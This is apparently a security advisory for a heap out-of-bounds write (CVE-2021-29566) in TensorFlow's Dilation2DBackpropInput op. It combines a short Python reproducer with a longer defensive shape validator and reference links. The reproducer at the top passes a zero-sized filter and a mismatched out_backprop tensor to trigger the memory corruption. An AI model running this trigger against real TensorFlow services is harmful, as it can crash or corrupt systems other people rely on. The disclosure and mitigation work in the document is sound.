CVE-2021-29566: Heap OOB access in `Dilation2DBackpropInput`
An attacker can write outside the bounds of heap-allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput:

import tensorflow as tf
# Well-formed 4-D input: [batch, rows, cols, depth]
input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32)
# Filter with zero spatial extent (shape [0, 0, 3]): an invalid argument the op accepts
filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32)
# out_backprop whose shape is unrelated to the output implied by input/filter/strides/rates
out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32)
tf.raw_ops.Dilation2DBackpropInput(
    input=input_tensor, filter=filter, out_backprop=out_backprop,
    strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
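The defensive counterpart to the reproducer above is to check that the argument shapes are mutually consistent before the op is invoked, so that a zero-sized filter or an out_backprop tensor that does not match the forward output shape is rejected up front. The following validator is an added example, not TensorFlow's code and not the upstream fix; the dimension formulas follow TensorFlow's documented VALID/SAME conventions (effective window = (k - 1) * rate + 1), while the function names and the (ok, reason) return convention are this example's own. It does not require TensorFlow and runs on plain shape tuples.

```python
# Added example (not TensorFlow code): pre-flight shape validation for the
# arguments of a Dilation2DBackpropInput-style call. It rejects the inconsistent
# argument combinations the advisory describes (empty filter, out_backprop that
# does not match the output implied by input/filter/strides/rates/padding).
import math


def dilated_extent(k, rate):
    """Effective size of a k-wide window once its taps are spaced `rate` apart."""
    return (k - 1) * rate + 1


def output_dim(in_size, k, rate, stride, padding):
    """Spatial output size on one axis; None when the dilated window does not fit."""
    eff = dilated_extent(k, rate)
    if padding == "VALID":
        if in_size - eff + 1 <= 0:
            return None
        return math.ceil((in_size - eff + 1) / stride)
    if padding == "SAME":
        return math.ceil(in_size / stride)
    return None


def validate_dilation2d_backprop_input(input_shape, filter_shape, out_backprop_shape,
                                       strides, rates, padding):
    """Return (True, "ok") when the shapes are consistent, else (False, reason)."""
    if len(input_shape) != 4:
        return False, "input must be 4-D [batch, rows, cols, depth]"
    if len(filter_shape) != 3:
        return False, "filter must be 3-D [rows, cols, depth]"
    if len(out_backprop_shape) != 4:
        return False, "out_backprop must be 4-D"
    if len(strides) != 4 or len(rates) != 4:
        return False, "strides and rates must have 4 entries"
    if strides[0] != 1 or strides[3] != 1 or rates[0] != 1 or rates[3] != 1:
        return False, "batch and depth stride/rate must be 1"
    if min(strides) < 1 or min(rates) < 1:
        return False, "strides and rates must be positive"
    if padding not in ("VALID", "SAME"):
        return False, "padding must be VALID or SAME"

    batch, in_rows, in_cols, depth = input_shape
    f_rows, f_cols, f_depth = filter_shape
    # The advisory's PoC passes a [0, 0, 3] filter: a zero-sized window is rejected first.
    if f_rows < 1 or f_cols < 1:
        return False, "filter spatial dimensions must be at least 1"
    if f_depth != depth:
        return False, "filter depth must equal input depth"

    out_rows = output_dim(in_rows, f_rows, rates[1], strides[1], padding)
    out_cols = output_dim(in_cols, f_cols, rates[2], strides[2], padding)
    if out_rows is None or out_cols is None:
        return False, "dilated filter does not fit inside the input"

    # out_backprop is indexed by the forward op's output coordinates; any other
    # shape means the backward loop would index past the buffers it was handed.
    expected = (batch, out_rows, out_cols, depth)
    if tuple(out_backprop_shape) != expected:
        return False, f"out_backprop shape {tuple(out_backprop_shape)} != expected {expected}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample: the argument shapes from the advisory's reproducer.
    print(validate_dilation2d_backprop_input(
        (3, 3, 3, 3), (0, 0, 3), (3, 2, 59, 3), [1, 40, 1, 1], [1, 56, 56, 1], "VALID"))
```

Run against the reproducer's shapes the validator rejects the call on the empty filter; with a non-empty filter it would still reject the [3, 2, 59, 3] out_backprop, since a [3, 3, 3, 3] input and a [2, 2, 3] filter with unit strides and rates imply a [3, 2, 2, 3] output. A wrapper like this is a stop-gap for callers that cannot immediately move to a TensorFlow release containing the fix commit listed in the references.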
References
- github.com/advisories/GHSA-pvrc-hg3f-58r6
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-494.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-692.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-203.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/3f6fe4dfef6f57e768260b48166c27d148f3015f
- github.com/tensorflow/tensorflow/security/advisories/GHSA-pvrc-hg3f-58r6
- nvd.nist.gov/vuln/detail/CVE-2021-29566